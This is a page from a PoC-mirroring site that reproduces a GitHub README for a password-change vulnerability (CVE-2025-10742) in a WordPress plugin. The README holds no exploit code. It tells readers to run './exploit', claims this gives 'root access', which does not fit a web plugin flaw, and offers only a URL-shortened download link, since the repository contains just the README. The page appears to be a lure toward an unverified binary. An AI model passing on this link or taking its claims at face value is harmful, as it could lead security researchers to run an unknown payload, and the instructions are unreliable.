Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-10742 PoC — Truelysell Core <= 1.8.6 - Unauthenticated Arbitrary User Password Change

Source
https://github.com/netspecters/CVE-2025-10742
Associated Vulnerability
Title:Truelysell Core <= 1.8.6 - Unauthenticated Arbitrary User Password Change (CVE-2025-10742)
Description:The Truelysell Core plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.8.6. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note: This can only be exploited unauthenticated if the attacker knows which page contains the 'truelysell_edit_staff' shortcode.
Readme
# CVE-2025-10742

## Overview

The Truelysell Core plugin for WordPress introduces a security flaw that allows unauthorized users to change passwords of existing accounts

## Vulnerability Details

This vulnerability arises from insufficient access controls, enabling attackers to exploit the 'truelysell_edit_staff' shortcode without authentication. Consequently, unauthenticated individuals can manipulate user passwords, which poses a significant risk of unauthorized account access, including the potential compromise of administrator privileges. Website owners using affected plugin versions are urged to implement security measures and update to the latest version to safeguard their systems.

### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low


Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.


### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/2w2ktfmd)
File Snapshot

 [4.0K]  /data/pocs/8dc9f2f2485c475073d6cc26c5020e86187545c5
└── [1.4K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →